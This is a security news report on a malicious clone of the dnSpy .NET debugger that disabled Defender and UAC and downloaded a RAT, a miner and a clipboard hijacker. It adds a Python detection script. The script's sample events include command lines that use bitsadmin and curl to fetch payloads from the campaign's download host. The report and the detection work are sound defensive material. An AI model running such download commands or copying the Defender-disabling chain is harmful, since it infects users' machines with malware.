In a complex malware campaign, hackers targeted cybersecurity experts and developers, distributing a malicious version of the dnSpy .NET app to deploy cryptocurrency stealers, miners, and remote access trojans.
dnSpy is a widely used debugger and .NET assembly editor for debugging, modifying, and decompiling .NET programs. Security experts often use it when analyzing .NET malware and applications. While the original creators are no longer actively developing the program, the original source code and a new actively developed version are accessible on GitHub for anybody to clone and modify.
A threat actor recently posted a GitHub repository with a modified version of dnSpy that installs a slew of malware, including cryptocurrency-stealing clipboard hijackers, the Quasar remote access trojan, a miner, and a range of unknown payloads. According to security researchers 0day enthusiast and MalwareHunterTeam, the malicious dnSpy project was initially hosted at https://github[.]com/carbonblackz/dnSpy/ and then switched to https://github[.]com/isharpdev/dnSpy to appear more convincing.
The threat actors also developed a well-designed and professional-looking website at dnSpy[.]net; however, this site is currently down. To promote the website, they used effective search engine optimization to place dnSpy[.]net on Google’s first page. Bing, Yahoo, AOL, Yandex, and Ask.com also ranked this domain highly. As a backup strategy, they also took out search engine ads so that the site appeared first in search results.
When the malicious dnSpy application is run, it appears to be legitimate software. It lets you open .NET apps, debug them, and perform all of the program’s typical operations. However, when the malicious dnSpy app [VirusTotal] is opened, it runs a series of commands that create scheduled tasks with elevated permissions.
According to a list of commands provided by MalwareHunterTeam, the malware performs the following operations:
- Disables Microsoft Defender
- Uses bitsadmin.exe to download curl.exe to %windir%\system32\curl.exe
- Uses curl.exe and bitsadmin.exe to download a variety of payloads to the C:\Trash folder and launch them
- Disables User Account Control
The payloads are downloaded from http://4api[.]net/ and include the following malware:
- %windir%\system32\curl.exe – The curl program
- C:\Trash\ck.exe – Unknown
- C:\Trash\c.exe – Unknown [VirusTotal]
- C:\Trash\cbo.exe – Unknown [VirusTotal]
- C:\Trash\cbot.exe – Clipboard Hijacker [VirusTotal]
- C:\Trash\m.exe – Miner [VirusTotal]
- C:\Trash\qs.exe – Quasar RAT [VirusTotal]
- C:\Trash\nnj.exe – Unknown
- C:\Trash\d.exe – Legitimate Defender Control application to disable Microsoft Defender [VirusTotal]
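The drop locations and download host listed above can be turned into process-creation detections. The following Python is an added example, not code from the researchers or the original report; the rule names, host names (ws-01, ws-02) and sample command lines are constructed for illustration, and only the paths and the 4api[.]net host come from the lists above.

```python
import re

# Indicators come from the behaviour and payload lists above; rule names are hypothetical.
C2_HOST = "4api[.]net".replace("[.]", ".")  # kept defanged in source, refanged for matching
RULES = {
    # bitsadmin writing curl.exe into system32 (plain curl use from system32 is not flagged)
    "bitsadmin_drops_curl_in_system32": re.compile(
        r"bitsadmin(\.exe)?\b.*\\system32\\curl\.exe", re.I),
    # bitsadmin or curl saving anything under C:\Trash
    "download_into_c_trash": re.compile(
        r"\b(bitsadmin|curl)(\.exe)?\b.*\bC:\\Trash\\", re.I),
    # a binary launched directly from C:\Trash
    "execution_from_c_trash": re.compile(r'^"?C:\\Trash\\[^\\"]+\.exe', re.I),
    # any command line that references the payload host
    "payload_host": re.compile(r"(?<![\w.-])" + re.escape(C2_HOST) + r"\b", re.I),
}

def match_rules(command_line):
    """Return the sorted names of every rule the command line triggers."""
    return sorted(name for name, rx in RULES.items() if rx.search(command_line))

def triage(events):
    """Group rule hits per host; events is an iterable of (host, command_line)."""
    hits = {}
    for host, cmdline in events:
        matched = match_rules(cmdline)
        if matched:
            hits.setdefault(host, set()).update(matched)
    return {host: sorted(names) for host, names in hits.items()}

# Constructed process-creation events, not captured from the real sample.
SAMPLE_EVENTS = [
    ("ws-01", rf"bitsadmin /transfer job1 http://{C2_HOST}/ C:\Windows\system32\curl.exe"),
    ("ws-01", rf"curl.exe -o C:\Trash\qs.exe http://{C2_HOST}/"),
    ("ws-01", r'"C:\Trash\qs.exe"'),
    ("ws-02", r"curl.exe -sS https://example.com/health"),
    ("ws-02", r"bitsadmin /list /allusers"),
]

if __name__ == "__main__":
    for host, names in triage(SAMPLE_EVENTS).items():
        print(host, names)
```

Feed it the command-line field from Sysmon Event ID 1 or Windows Security Event 4688 records; a host that trips several rules at once is the one to isolate first.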
Both dnSpy[.]net and the GitHub repository used to power this campaign are now unavailable. Nevertheless, security researchers and developers must stay on the lookout for malicious clones of popular projects that infect their devices with malware.